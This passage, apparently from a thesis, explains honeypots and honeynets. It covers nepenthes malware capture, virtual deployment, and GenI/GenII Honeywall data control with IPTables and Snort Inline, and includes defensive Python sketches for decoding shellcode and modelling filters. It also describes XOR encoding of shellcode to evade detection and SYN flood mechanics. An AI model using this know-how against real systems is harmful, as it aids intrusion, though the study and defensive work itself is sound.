In comparison to other electronic baits, this approach has several advantages: First,
system requirements regarding processing resources and memory are quite low. As
a result, the solution is highly scalable, and multiple instances of nepenthes can be
deployed in parallel. Second, development efforts are dramatically reduced. For instance,
Bächer et al. (2006) note that a working module often comprises less than 500 lines of
source code. Due to the decreased level of complexity, honeypot administrators may also
quickly react to emerging threats. For example, in 2004, the Local Security Authority
Subsystem Service (LSASS) in the Microsoft Windows operating system was prone to
a so-called buffer overrun (see Microsoft Corporation, 2004c): A sophisticated attacker
could remotely overwrite sections of internal memory by sending a specially crafted
character sequence to the service. As a consequence, it was possible to execute arbitrary
malicious code and gain control of the underlying machine. Shortly after the release
of the official security bulletin, a Proof of Concept (PoC) paper was published that
successfully demonstrated the exploitation of the security weakness (see SecurityFocus,
2004; Wicherski and Holz, 2006). Based on this information, the nepenthes development
team was able to program a corresponding vulnerability module and simulate an affected
platform within a short amount of time. In consequence, it was possible to study the
penetration technique in more detail and quickly start capturing newly spreading attack
tools.
When an emulated service is compromised, the payload or shellcode of the attack
is passed to a shellcode parsing module. The shellcode is frequently stored within a
character array and contains machine-language instructions that are injected
into the target program in order to manipulate its functionality (see Koziol et al., 2004).
The instructions must not include any null bytes though, because these are interpreted
as string terminators and may cause the attack to fail (see Aleph One, 1996). To properly
cope with this issue, adversaries usually encode their payload with exclusive or (XOR)
operators. As Bächer et al. (2006) argue, this procedure also helps evade certain sensors
of intrusion detection systems. Therefore, to restore the original payload used during
the intrusion, the parsing module must first decode the captured character sequence.
The result can then be examined with the help of regular expressions in the next step,
e.g., to find the source address of the respective binary.
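The two steps, decoding and pattern matching, can be sketched as follows. This is a simplified illustration and not the nepenthes implementation: we assume a single-byte XOR key that is already known, whereas a real parser would first have to recover the key from the decoder stub of the payload. The names `xor_decode`, `find_download_urls`, and `URL_PATTERN` are hypothetical.

```python
import re

# Matches printable, non-space characters after a supported scheme prefix.
URL_PATTERN = re.compile(rb"(?:https?|ftp|tftp)://[\x21-\x7e]+")


def xor_decode(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def find_download_urls(encoded: bytes, key: int) -> list:
    """Decode the captured payload and extract all download locations."""
    decoded = xor_decode(encoded, key)
    return [match.decode("ascii") for match in URL_PATTERN.findall(decoded)]
```

Note that XOR encoding with a suitable key also removes null bytes from the payload: a zero byte in the original data is simply replaced by the key value.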
This information is needed by the fetch modules to retrieve the sample from the
Internet. At the time of this writing, different transfer modes and network protocols
such as HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), or TFTP
(Trivial File Transfer Protocol) are supported. Furthermore, two special modules are
capable of dealing with IRC-related (Internet Relay Chat-related) propagation methods
that are favored by certain viruses, worms and other types of Internet threats (see Holz,
2005).
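Selecting a suitable fetch routine essentially amounts to dispatching on the scheme of the extracted address. The sketch below shows this idea with the standard library only. The function name `plan_download` and the returned tuple layout are our own assumptions; the port numbers are the well-known default ports of the respective protocols.

```python
from urllib.parse import urlsplit

# Well-known default ports of the transfer protocols named in the text.
SUPPORTED_SCHEMES = {"http": 80, "ftp": 21, "tftp": 69}


def plan_download(url: str):
    """Return (scheme, host, port, path) or None for unsupported schemes."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in SUPPORTED_SCHEMES:
        return None
    port = parts.port or SUPPORTED_SCHEMES[scheme]
    return scheme, parts.hostname, port, parts.path
```

A real fetch module would hand this tuple to a protocol-specific client; the sketch deliberately stops before any network access takes place.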
After a malicious file has been downloaded from its remote location, it can
be stored on the local hard disk, sent to a central database, or passed directly to a sandbox
for further investigation. These tasks are performed by the submission modules. In
the last case, the executable is safely launched within a controlled environment (see
Willems et al., 2007). Thereby, it is, for instance, possible to observe manipulations of
the file system structure, while mitigating the risk for uninvolved third parties as best
as possible.
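The simplest of these options, storing a sample on the local hard disk, can be sketched as shown below. Naming the file after a cryptographic digest of its content is our assumption here; it is a common way to avoid storing the same binary twice, but the sketch makes no claim about the file layout nepenthes actually uses. The function name `submit_to_disk` is hypothetical.

```python
import hashlib
from pathlib import Path


def submit_to_disk(sample: bytes, directory: Path) -> Path:
    """Store a sample under its SHA-256 digest and return the file path."""
    digest = hashlib.sha256(sample).hexdigest()
    target = directory / digest
    if not target.exists():
        # Identical binaries map to the same name and are written only once.
        directory.mkdir(parents=True, exist_ok=True)
        target.write_bytes(sample)
    return target
```

With this scheme, the number of files in the directory directly corresponds to the number of unique binaries collected.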
Apart from the program modules, nepenthes offers a number of additional features that
facilitate collecting autonomously spreading malware on a large scale, including a virtual
file system and a rudimentary, emulated shell attackers can interact with. Moreover,
the software comprises sophisticated logging capabilities that even permit monitoring
penetration attempts in real time. Last but not least, with the DNS (Domain Name
System) resolver module and an internal geographic database, attacks can be efficiently
traced to their country of origin. In sum, security professionals are thus able to generate
extensive statistical reports about adversaries and their intrusion strategies.
Most of the components described above can be tweaked and adapted, making the
low-interaction honeypot a very flexible and powerful tool (see Bächer et al., 2006).
We will illustrate the individual configuration options of the decoy in more detail in
Chapter 4. We will also illustrate how a bootable device with a pre-configured, fully
working nepenthes sensor can be developed. This device can make the deployment of
numerous electronic baits significantly easier.
2.5 Deployment Options for Honeypots
There exist two basic deployment options for electronic baits (cmp. Provos and Holz,
2007): A physical honeypot runs on a dedicated machine with its own IP address on
the network. As a result, the decoy closely mimics the characteristics and behavior of
a real computer system. Thus, attackers may fully interact with the host and gain
complete control of the system platform. On the other hand though, physical honeypots
are “typically expensive to install and maintain” (see Provos and Holz, 2007, p. 11).
Furthermore, the solution is hardly scalable, because different components and devices
must be acquired for each machine. Consequently, hardware costs quickly skyrocket
when multiple electronic baits must be set up. With respect to this case, an alternative
and more reasonable approach is deploying several virtual honeypots on a single system.
A virtual honeypot is built on top of a virtual machine, i.e., an isolated, secure, and
reliable computing environment (see Creasy, 1981). It shares all its resources with the
underlying host system and possibly other guest systems that are executed in parallel
on the computer. A sample illustration of a virtual honeypot setup is presented in
Figure 2.3(a). In the given example, two guest systems with the private IP addresses
192.168.1.1 and 192.168.1.2 are installed on a host that is directly connected to the
Internet.
In order to prevent collisions between the guest systems, a special software layer,
the virtual machine monitor (VMM), simulates replicas of the physical components.
Thereby, each machine appears to have its own CPU (Central Processing Unit), memory,
graphics adapter, network interface, and I/O (Input/Output) interface (see Figure 2.3(b)
and Parmelee et al., 1972; Goldberg, 1974). As a consequence, security professionals can
maintain various decoys with different operating systems as well as applications on one
computer, while keeping hardware costs down at the same time.
In comparison to their physical counterparts, virtual honeypots also have a number of
additional benefits (cmp. Provos and Holz, 2007): First, the electronic baits are easier
to maintain, because they are stored as plain files on the underlying host system. Thus,
they can be copied, shared, and distributed without difficulty. This technique also
Figure 2.3: Setup (a) and Architecture (b) of a Virtual Honeypot
(Source: Provos and Holz, 2007; VMWare, 2006)
permits taking snapshots of a running system and saving its current state. Thus, it is
possible to quickly restore the configuration of a decoy after it has been compromised.
Regarding the implementation of the virtual environment, two software products are
primarily referenced in the literature (see also Honeynet Project, 2004b): The open
source application User-mode Linux6 (UML) by Jeff Dike is a port of the Linux kernel to
its own system call interface (see Dike, 2006; Honeynet Project, 2002a). The kernel is built as an ordinary executable
binary. As a result, it can be started as a normal process
in user space and boot a second, Linux-based operating system. System calls that are
sent to the UML instance are then transparently passed to the host and are processed
by the underlying machine. This behavior is illustrated in Figure 2.4.
Even though the approach helps create a guest system on the target platform, the UML
instance can be fingerprinted quite easily as demonstrated by Provos and Holz (2007).
Therefore, the authors strongly advise against using the application for honeypots in
practice.
6 http://user-mode-linux.sourceforge.net/
Figure 2.4: Architecture of User-Mode Linux (Source: Based on Dike, 2006)
More advanced are the virtualization software solutions that are offered
by VMWare7. In the scope of this thesis, we focus on the free VMWare Server8. The
application provides a comfortable graphical user interface for administrative tasks and
even permits configuring virtual machines remotely over the Internet. In contrast to
UML, the product supports both Linux and Microsoft Windows operating systems as
well as other platforms such as Sun Solaris and Novell NetWare. It is highly scalable and
emulates complete x86-based computer systems. Due to these characteristics, multiple,
concurrently running virtual electronic decoys can be deployed. What is more, with the
help of a virtual bridge that is set up during the installation process of the software,
each honeypot is assigned its own IP address and, thus, may act as an entirely separate
machine on the network (see Provos and Holz, 2007, p. 27). A high-level overview of
this architecture is shown in Figure 2.5.
In spite of these features, sophisticated adversaries are potentially able to detect the
virtual environment, e.g., by recognizing subtle differences in the hardware layer of a
machine (see Holz and Raynal, 2005a,b). In this case, the presence of a honeypot is
possibly revealed, and the device is likely to be evaded in the future as we have already
explained. As Provos and Holz (2007, p. 22) conclude, the approach may thus “lead to
less information about attackers”.
7 http://www.vmware.com/
8 http://www.vmware.com/products/server/
Figure 2.5: Illustration of the Bridged Networking Functionality in VMWare
(Source: Based on Provos and Holz, 2007)
2.6 Summary
In this chapter, we have presented the methodic and technical concepts of honeypots.
Honeypots are computer systems which are intentionally designed to be insecure. They act
as electronic baits and enable security professionals to learn more about the tools, tactics,
and motives of adversaries. When they are deployed within a production environment,
they can help detect penetration attempts at the network perimeter and protect the
resources of an organization against Internet threats.
Because all interactions with a decoy are malicious by definition, captured data sets
are quite small. Moreover, in comparison to traditional monitoring stations such as
intrusion detection systems, the number of encountered false positives is significantly
lower.
Depending on the level of involvement and risk, we have distinguished two types
of electronic baits: A high-interaction honeypot offers attackers a real operating system
to interact with. In contrast, a low-interaction honeypot only emulates specific system
services. Neither of these solutions is superior to the other. Rather, both approaches have
their own advantages and disadvantages, as indicated in Table 2.1 (see also Honeynet
Project, 2004b; Provos and Holz, 2007). For this reason, the individual characteristics of
the technologies must be carefully judged, particularly with regard to the organizational
objectives (cmp. Spitzner, 2001b, 2002).
We have also differentiated between physical and virtual honeypots: A physical honeypot runs on a dedicated machine with its own IP address and closely mimics the behavior
of a real computer system. On the other hand, a virtual honeypot is executed within a
separate and secure computing environment. Since system resources are shared between
the individual guest systems, it is possible to deploy multiple decoys on a single host.
Thereby, hardware costs and maintenance efforts can be effectively reduced.
Low-Interaction Honeypots                 | High-Interaction Honeypots
------------------------------------------+------------------------------------------
easy installation, configuration, and     | increased complexity, harder to install
deployment                                | and to maintain
------------------------------------------+------------------------------------------
limited information capturing             | extensive information capturing
capabilities, e.g., authentication        | capabilities
credentials entered by the adversary      |
------------------------------------------+------------------------------------------
possibility to generate statistics at a   | possibility to analyze intrusions in
higher level of abstraction               | detail, including tools, communications,
                                          | and keystrokes of adversaries
------------------------------------------+------------------------------------------
minimal risk, because solely emulated     | higher risk as attackers are offered
services are exposed to attacks           | complete operating systems and fully
                                          | working services to interact with
Table 2.1: Advantages and Disadvantages of Low-Interaction and
High-Interaction Honeypots
We have given an overview of two software products that are capable of setting
up a virtual environment: User-mode Linux patches the system core in order to execute
numerous instances of a Linux-based operating system on top of the host kernel. The
virtualization software VMWare emulates complete x86-based computer systems and
supports a variety of different operating systems. In the scope of this thesis, we focus on
the freely available VMWare Server. It offers a comfortable user interface that makes
the administration of our virtual honeypots significantly easier.
It is important to note though that the value of electronic baits can be considerably increased
when they are linked in a so-called honeynet. We will have a closer look at this technology
in the next chapter.
In the previous chapter, we have illustrated the concept and value of honeypots. Individually deployed electronic baits share a common problem though: As stand-alone
systems, they have a narrowed field of view, i.e., they do not capture malicious activities,
unless they are attacked directly (see Spitzner, 2002, 2003a). Therefore, a more meaningful approach is building a so-called honeynet and learning about security-related incidents
on a network-wide scale. It is then possible to link data accumulated from different
machines, e.g., to create a more accurate profile of adversaries after an intrusion.
A honeynet is a group of honeypots that are set up and interconnected behind a special gateway with monitoring and filtering capabilities (cmp. Honeynet Project, 2004b;
Curran et al., 2005). As such, a separated, highly controlled environment can be created
as indicated in Figure 3.1. Similar to a honeypot, the purpose of a honeynet lies in
being probed, attacked, and compromised (see Honeynet Project, 2006). However, in
comparison to a single system, information collected about threats is more expressive
and, hence, more valuable as we have already noted above. On the other hand, the level
of complexity is significantly higher. That is why certain guidelines have been proposed
in order to safely deploy a honeynet.
According to the Honeynet Project (2004a), the most important aspect that needs to
be considered is data control. Data control is defined as the “containment of activity”
(Honeynet Project, 2004b, p. 37), i.e., attackers must be prevented from affecting non-honeynet systems (see Honeynet Project, 2005e). This requirement often turns out to be
difficult to realize in practice, because organizations need to find a tradeoff between
freedom and risk (cmp. Honeynet Project, 2004b): If adversaries are granted a higher
degree of freedom, their behavior can be studied in detail, but the level of risk rises in
parallel as well. Therefore, to mitigate threats as best as possible, several best practices
have proven helpful: First, at least two different data control mechanisms and layers
should be used to avoid a single point of failure. Second, implementations should permit
manual intervention. Third and last, the system should completely block access to the
honeynet in case all layers collapse.
A second major element that must be taken into consideration when building a honeynet is data capture. This refers to the “monitoring and logging of all the blackhat’s
activities” (Honeynet Project, 2004b, p. 39). In compliance with data control, it is
suggested to implement multiple layers in order to observe adversaries as closely as
possible.
With regard to the third factor, data analysis, it is crucial to store log files and
other records created during incidents outside the honeynet in a secure location to ensure the integrity of the captured data. Administrators are also advised to maintain
standardized reports of each compromise. This approach facilitates a later classification
of the observed intrusions and helps to learn about the tools, tactics, and motives of attackers
(cmp. Honeynet Project, 2006).
Figure 3.1: Overview about the Honeynet Architecture
(Source: Based on Honeynet Project, 2006)
As we will see, the technical implementation of the individual guidelines and requirements as described has changed significantly throughout the years (see also Honeynet
Project, 2005d). Therefore, we first give a brief overview of historical honeynet
architectures in Section 3.1. The current technologies and tools in use are the subject of
Sections 3.2 and 3.3. In Section 3.4, we illustrate the deployment process of a virtual
honeynet and outline the setup of a future solution, so-called distributed honeynets. We
conclude with a summary of the different concepts and methodologies in Section 3.5.
3.1 Historical Implementations of Honeynets
A preliminary version of a honeynet was already deployed in 1987 by the system manager
Cliff Stoll (see Stoll, 2005). While working at the Lawrence Berkeley Lab, Stoll detected
penetration attempts on multiple computer systems. He decided to watch the intruder
over a period of several months and used rudimentary data capture and data control
mechanisms. For instance, he created various interesting-sounding files that served as
electronic decoys. Thereby, Stoll hoped to distract the attacker from other vulnerable
network segments, while learning as much as possible about his intentions and motives
at the same time. With the collected information, he was finally able to track down the
adversary and uncover a severe case of industrial espionage.
The first organizational honeynet solution was developed in 1999 by members of the
Honeynet Project Research Alliance (see Honeynet Project, 2004b). The central element
of the so-called GenI honeynet was formed by a conventional firewall. When a decoy
was compromised, all outgoing network connections were blocked after a predefined limit
had been reached. With the help of this simple data control mechanism, the external
environment could be protected against automated scans and other types of malicious
activities (see Spitzner, 2003b).
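The counting logic behind this data control mechanism can be sketched as follows. The class name `OutboundLimiter` and the per-honeypot bookkeeping are our assumptions for illustration; in a GenI honeynet, the limit was enforced by the firewall itself, and the source does not specify how its counters were organized.

```python
from collections import defaultdict


class OutboundLimiter:
    """Allow a fixed number of outgoing connections per honeypot."""

    def __init__(self, limit: int):
        self.limit = limit
        self.counts = defaultdict(int)  # honeypot IP -> connections so far

    def allow(self, honeypot_ip: str) -> bool:
        """Return True while the honeypot is below its connection limit."""
        if self.counts[honeypot_ip] >= self.limit:
            return False  # limit reached: block all further connections
        self.counts[honeypot_ip] += 1
        return True
```

The choice of the limit reflects the tradeoff between freedom and risk: a small value protects third parties well, but may prevent an intruder from downloading her tools and thus reduce the amount of information gained.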
On the other hand, data capture requirements were met by installing an intrusion
detection system that recorded all inbound as well as outbound traffic flows. In case
an alert was recognized, the device sent a notification message to a remote log server.
Thereby, captured data sets could be effectively guarded against deletion and manipulation. The interaction between the different components is illustrated in Figure 3.2.
With first generation honeynets, security professionals were able to study the behavior of autonomously propagating malware and low-skilled adversaries. In spite of these
capabilities, the architecture suffered from several drawbacks (cmp. Honeynet Project,
2004b): First, network operations were entirely based on the TCP/IP network layer
of the OSI (Open Systems Interconnection) reference model (see Stevens, 1994; Comer,
2000, for a complete description of the different network layers). As a result, all devices,
including the firewall, the intrusion detection system, and the log server, were assigned
their own IP addresses and were publicly accessible over the Internet. As participants
of the Honeynet Project (2004b, p. 96) explain, “this reveal(ed) their existence to the
probing blackhat, so the risk of becoming possible targets (was) high”. Second, as numerous software applications had to be installed and maintained, the deployment of a
GenI honeynet was time-consuming and error-prone. Furthermore, stealthily capturing keystrokes as well as analyzing encrypted sessions was exceedingly complex (cmp.
Spitzner, 2002), even though various tools helped facilitate this process (see Antonomasia, 2003; Floydman, 2002).
In order to cope with these issues, the system setting was completely redesigned in
2001 and led to the development of new and advanced variants, so-called GenII and
GenIII honeynets. We will present their functionality in the following sections.
Figure 3.2: Architecture of a GenI Honeynet
(Source: Based on Honeynet Project, 2004b)
3.2 GenII Honeynets
In comparison to first generation honeynets, GenII honeynets are more powerful and
more efficient with regard to their observation capabilities, their detectability, and their
ease of maintenance (cmp. Honeynet Project, 2004b). These key benefits result from
two major architectural characteristics: First, the honeynet gateway is implemented
as a transparent bridge (see Honeynet Project, 2005e). A bridge connects separated
networks and operates on the data link layer, i.e., the second layer of the OSI reference model
(cmp. Perlman, 1999). Data units sent over this layer are known as frames and carry
48-bit hardware addresses, the so-called Media Access Control (MAC) addresses. When a frame
arrives at a bridge, its destination MAC address is extracted and looked up in an internal system
table to identify its physical destination. If a matching entry is found, the frame is
forwarded to its designated location. Otherwise, it is broadcast to every network
except the one it was received on (see Tanenbaum, 2003).
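The forwarding decision described above can be sketched in a few lines. The class name `Bridge` and its interface are hypothetical. In addition to the lookup, the sketch fills the table by remembering the port on which each sender address was seen, which is how transparent bridges commonly populate their tables; this learning step is our addition and is not spelled out in the description above.

```python
class Bridge:
    """Minimal model of a transparent bridge with an address table."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.table = {}  # MAC address -> port on which it was last seen

    def receive(self, in_port, src_mac, dst_mac):
        """Return the list of ports the frame is sent out on."""
        self.table[src_mac] = in_port  # learn where the sender is attached
        out_port = self.table.get(dst_mac)
        if out_port is None:
            # Unknown destination: send to every port except the incoming one.
            return [p for p in self.ports if p != in_port]
        if out_port == in_port:
            return []  # destination sits on the same segment, nothing to do
        return [out_port]
```

Note that the decision relies exclusively on layer 2 addresses; the IP header of the encapsulated packet is never inspected or modified.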
It is important to note that these operations have no effect on protocols working on
higher network layers, e.g., IP. As a consequence, a number of popular reconnaissance
attacks are rendered useless (cmp. Honeynet Project, 2004b). For instance, adversaries
often execute a traceroute command to monitor the TTL (Time to Live) field in
the header of an IP packet en route to a target. Because each intermediary machine that routes the packet
decrements the TTL value by one (see Postel, 1981b), the presence of firewalls and IDSs
can be easily discovered. On the other hand, when an IP packet passes through a bridge,
its TTL field is not modified. Therefore, an instance of the honeynet gateway is hard
to detect. Moreover, compromising the device directly is difficult as well, because the
bridging network interfaces do not have their own IP addresses (cmp. Honeynet Project,
2004b). However, it is still possible to administer the gateway system over a remote
connection as indicated by the dotted line in Figure 3.3. For this purpose, a third
network interface card (NIC) is required.
Figure 3.3: Architecture of a GenII Honeynet
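The TTL argument can be made concrete with a small simulation. The sketch below is a simplified model under our own assumptions: a path is a list of (name, kind) pairs with kind being either "router" or "bridge", and a probe that passes all devices is considered to have reached the target. The function name `visible_hops` is hypothetical.

```python
def visible_hops(path, max_ttl=30):
    """Return the devices a traceroute-style scan would reveal.

    Probes are sent with TTL 1, 2, 3, ... A router decrements the TTL and
    answers when it reaches zero; a bridge forwards without touching it.
    """
    seen = []
    for ttl in range(1, max_ttl + 1):
        remaining = ttl
        answered = None
        for name, kind in path:
            if kind == "router":
                remaining -= 1
                if remaining == 0:
                    answered = name  # this hop reports the expired probe
                    break
            # A bridge leaves the TTL unchanged and therefore stays hidden.
        if answered is None:
            break  # the probe reached the target, the scan is complete
        seen.append(answered)
    return seen
```

For a path consisting of two routers followed by a bridging honeynet gateway, the function returns only the two routers; the gateway does not appear in the result.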
The second difference to GenI honeynets concerns the implementation of data control
and data capture measures. Instead of deploying the required tools on separate machines,
all applications are installed on the gateway system. Thus, malicious activities may
effectively be blocked at a central point whenever it is desired. Because of this behavior,
the honeynet gateway is also often referred to as the Honeywall. We will cover the
individual components of the Honeywall according to their function in the following.
3.2.1 Data Control Implementations
GenII honeynets use a combination of filtering and intrusion detection mechanisms to
control inbound and outbound network traffic. The tools used on the Honeywall are
netfilter, IPTables, and Snort Inline.
• Netfilter and IPTables
Network packets can be intercepted and manipulated on the honeynet gateway with the
netfilter software1. Netfilter operates on the kernel level and provides sophisticated routing and filtering capabilities that are required to implement a fully functional network
firewall (cmp. Russell, 2002).
1 see http://www.netfilter.org/
Figure 3.4: Network Filtering Capabilities of the Honeynet Gateway
Whenever a packet is about to enter or leave the honeynet, it is processed on the
Honeywall and compared against a set of internal rules. Based on these rules, pre-defined
actions can be taken. For instance, the packet may get accepted and be forwarded to the
target machine, as it is indicated in Figure 3.4. Alternatively, it may also be rejected, e.g.,
to protect specific network segments and mitigate risks for uninvolved third parties as
best as possible. A short description of the individual actions can be found in Table 3.1.
Netfilter rules can be manipulated in user space with the help of the IPTables2 interface
that was developed by Rusty Russell. For instance, to define a firewall exception for
the honeypot with the IP address 192.168.1.2, we invoke the application with the -A
parameter as follows:
iptables -A INPUT -p tcp --dport 22 -d 192.168.1.2 -j ACCEPT
In the given example, we add a new rule to the packet filter in order to accept (-j parameter) inbound (INPUT parameter), TCP-based traffic flows (-p parameter), targeting
the secure shell server on port 22 (--dport parameter) of the decoy (-d parameter). A
complete overview about the myriad of IPTables commands and parameters is given by
Russell (2002).
2 see http://www.netfilter.org/projects/iptables/index.html
Action    Description
ACCEPT    The packet is free to continue its path.
DROP      The packet is silently rejected without sending an error message to the originator.
LOG       The packet is logged with a user-defined informational text.
REJECT    The packet is rejected, and an error message is sent to the originator.
QUEUE     The packet is placed on the queue and may be accessed by a user space process.
Table 3.1: List of Possible netfilter Actions
(Source: Based on Honeynet Project, 2004b, p. 103)
State          Description
NEW            The packet initiates a fresh connection.
ESTABLISHED    The packet belongs to an existing connection that transfers data in both directions.
RELATED        The packet is related to an existing connection, for example an FTP session.
INVALID        The packet could not be processed correctly and should generally be dropped.
Table 3.2: List of Connection States as Distinguished by IPTables
(Source: Honeynet Project, 2004b; Russell, 2002)
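The way a packet is compared against a list of rules can be sketched in a few lines. The sketch below is a heavily simplified model and not netfilter code: the Rule and Packet classes, the evaluate function, and the default policy of DROP are assumptions made for illustration only.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Packet:
    protocol: str
    dst_ip: str
    dst_port: int


@dataclass
class Rule:
    """Hypothetical, simplified counterpart of a single packet filter rule."""
    action: str                      # e.g. "ACCEPT" or "DROP"
    protocol: Optional[str] = None   # None means "match any value"
    dst_ip: Optional[str] = None
    dst_port: Optional[int] = None

    def matches(self, packet: Packet) -> bool:
        return (
            self.protocol in (None, packet.protocol)
            and self.dst_ip in (None, packet.dst_ip)
            and self.dst_port in (None, packet.dst_port)
        )


def evaluate(chain: list, packet: Packet, policy: str = "DROP") -> str:
    """Return the action of the first matching rule, else the chain policy."""
    for rule in chain:
        if rule.matches(packet):
            return rule.action
    return policy


# Model of the SSH exception for the honeypot with the address 192.168.1.2.
chain = [Rule(action="ACCEPT", protocol="tcp", dst_ip="192.168.1.2", dst_port=22)]
print(evaluate(chain, Packet("tcp", "192.168.1.2", 22)))
print(evaluate(chain, Packet("tcp", "192.168.1.2", 80)))
```

The first-match semantics are the essential point: a packet that meets no exception falls through to the policy of the chain.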
In addition to the firewall rules, two components of IPTables are particularly relevant
for implementing efficient data control mechanisms on the Honeywall: With the help of
the state module, we are able to define fine-grained filter rules based on the connection
state a packet is in (see Table 3.2). As a result, we can efficiently keep track of different
network sessions. With the second, limit module, it is possible to restrict the maximum
number of packets that are processed within a given time interval: After the specified
limit has been reached, further packets are automatically discarded.
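One common way to enforce such a limit is a token bucket. The following sketch illustrates the idea under this assumption; the class name, its parameters, and the explicit time argument are chosen for this example and do not mirror the interface of the limit module.

```python
class TokenBucket:
    """Simplified rate limiter: `rate` packets per second, bursts up to `burst`."""

    def __init__(self, rate: float, burst: int) -> None:
        self.rate = rate
        self.burst = burst
        self.tokens = float(burst)   # the bucket starts full
        self.last = 0.0              # time of the previous decision in seconds

    def allow(self, now: float) -> bool:
        """Return True if a packet arriving at time `now` may pass."""
        elapsed = now - self.last
        self.last = now
        # Refill proportionally to the elapsed time, capped at the burst size.
        self.tokens = min(self.burst, self.tokens + elapsed * self.rate)
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


bucket = TokenBucket(rate=1.0, burst=3)
decisions = [bucket.allow(now=0.0) for _ in range(5)]   # five packets at once
later = bucket.allow(now=2.0)                           # one packet two seconds later
```

In this example, the first three packets pass, the next two are discarded, and the packet that arrives two seconds later is accepted again because the bucket has been refilled in the meantime.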
The two components operate collaboratively on the gateway system. This functionality is called Connection Rate Limiting Mode (CRLM) and is particularly useful for
preventing Denial of Service (DoS) attacks that are launched from compromised honeypots. In the course of a DoS attack, all resources of a system are consumed. As a
consequence, services may not be accessed by legitimate users any longer (cmp. Moore
et al., 2006). A well-known example for this type of incident is a SYN Flood (see CERT,
1996). The attack exploits an idiosyncrasy in the architecture of the TCP protocol: TCP
connections must be established with a so-called handshake (see Postel, 1981c; Stevens,
1994). The client initiates the communication channel by sending a synchronize (SYN)
request to the server. The server acknowledges the request and returns a packet with
both the SYN and ACK flags set. In turn, the client confirms the reply with a third
packet to complete the handshake. This process is illustrated in Figure 3.5(a). If the
last packet is not sent, however, the connection is left half-open (cmp. CERT, 1996, and
Figure 3.5(b)). Thus, internal memory on the server is consumed. Consequently, if an
adversary initiates a huge number of connections but does not acknowledge messages
from the server, storage capacities are eventually exceeded. As a result, the performance
level is degraded, and the target machine finally collapses. To prevent system crashes,
Bernstein (1996) has proposed the use of SYN Cookies: Rather than maintaining a large
TCP stack, the server calculates a specially crafted initial sequence number and stores
the state-specific information about the connection entirely in its response packet (see also
Eddy, 2007). When the client replies with the final packet, the sequence number is
checked, the connection state is restored, and the handshake is completed. As a result,
flooding operations do not exhaust system resources any longer, but solely require
temporary processor cycles.
Figure 3.5: Illustration of a Full (a) and a Half-Open (b) TCP Handshake
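The principle behind SYN Cookies can be sketched as follows. Please note that this is a simplified illustration and not the bit layout proposed by Bernstein (1996): we assume a keyed hash over the connection parameters, and the secret, the time_slot parameter, and both function names are hypothetical.

```python
import hashlib
import hmac
import struct

SECRET = b"example-secret"  # assumption: a key known only to the server


def make_cookie(src_ip: str, src_port: int, dst_ip: str, dst_port: int,
                client_isn: int, time_slot: int) -> int:
    """Derive a 32-bit initial sequence number from the connection parameters."""
    message = (
        f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{client_isn}|{time_slot}"
    ).encode()
    digest = hmac.new(SECRET, message, hashlib.sha256).digest()
    return struct.unpack("!I", digest[:4])[0]


def check_ack(src_ip: str, src_port: int, dst_ip: str, dst_port: int,
              client_isn: int, time_slot: int, ack_number: int) -> bool:
    """Recompute the cookie; a valid final ACK acknowledges cookie + 1."""
    cookie = make_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, time_slot)
    return ack_number == (cookie + 1) % 2**32


# The server answers a SYN with the cookie and keeps no state for the connection.
cookie = make_cookie("10.0.0.5", 40000, "192.168.1.2", 80, 12345, 7)
valid = check_ack("10.0.0.5", 40000, "192.168.1.2", 80, 12345, 7, (cookie + 1) % 2**32)
```

Since the server can recompute the value from the final packet alone, half-open connections do not occupy any memory.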
A different approach to cope with DoS attacks is implemented on the Honeywall:
As soon as a certain number of connections has been established, the gateway device
stops forwarding packets going out of the honeynet. Thereby, outbound network traffic
can be controlled, and the external environment is protected. In practice, about 20
TCP connections, 20 UDP connections, 50 ICMP connections, and 10 other, non-IP
connections per hour are regarded as adequate values (see Honeynet Project, 2005a).
It is important to emphasize though that these settings are not sufficient to mitigate
all potential threats. As Provos and Holz (2007, p. 65) point out, “connection limiting
does not help if the attacker uses a specific exploit against another host”. With respect
to this scenario, we must rely on Snort Inline, a second data control mechanism of the
Honeywall. We outline the functionality of this application in the following.
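The outbound limits mentioned above can be modeled with a simple counter per protocol. The sketch below is an illustration only: it assumes a fixed one-hour window, and the class and its method are hypothetical names that do not correspond to the actual Honeywall scripts.

```python
from collections import defaultdict

# Hourly limits quoted in the text; the keys are labels chosen for this sketch.
LIMITS_PER_HOUR = {"tcp": 20, "udp": 20, "icmp": 50, "other": 10}


class OutboundLimiter:
    """Counts new outbound connections per protocol within one-hour windows."""

    def __init__(self, limits: dict) -> None:
        self.limits = limits
        self.window_start = 0.0
        self.counts = defaultdict(int)

    def allow(self, protocol: str, now: float) -> bool:
        """Return True if a new outbound connection may be forwarded."""
        if now - self.window_start >= 3600:   # begin a fresh one-hour window
            self.window_start = now
            self.counts.clear()
        key = protocol if protocol in self.limits else "other"
        if self.counts[key] >= self.limits[key]:
            return False                      # limit reached: stop forwarding
        self.counts[key] += 1
        return True


limiter = OutboundLimiter(LIMITS_PER_HOUR)
results = [limiter.allow("tcp", now=float(i)) for i in range(25)]
print(results.count(True))
```

Of the 25 connection attempts in this example, only the first 20 are forwarded; new connections are permitted again once the next window begins.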
• Snort Inline
Snort Inline3 operates as a network intrusion prevention system (NIPS) on the honeynet
gateway and is capable of efficiently blocking attacks going out of the honeynet. It
closely interacts with the IPTables packet filtering software as follows: Data streams of
outbound network packets are inspected by the NIPS to assess the level of risk for the
external environment. If a potentially dangerous pattern is found, control is passed to
the firewall, and the respective packet is dropped. This process is illustrated in Figure 3.6
and is known as Packet Drop Mode (PDM) (see Honeynet Project, 2004b, 2005e).
It is crucial to note though that packet dropping does not affect legitimate, nonthreatening traffic flows. For example, outgoing DNS (Domain Name System) queries
or NTP (Network Time Protocol) requests may safely pass the Honeywall without interference. Because of these characteristics, the presence of the gateway device can be
effectively concealed from the eyes of probing blackhats (see Honeynet Project, 2004b).
In addition, Snort Inline also supports a so-called Packet Replace Mode (PRM) which
permits even more powerful and stealthy operations. In contrast to PDM, a suspicious
packet is not completely dropped, but solely specific sections in its header or body are
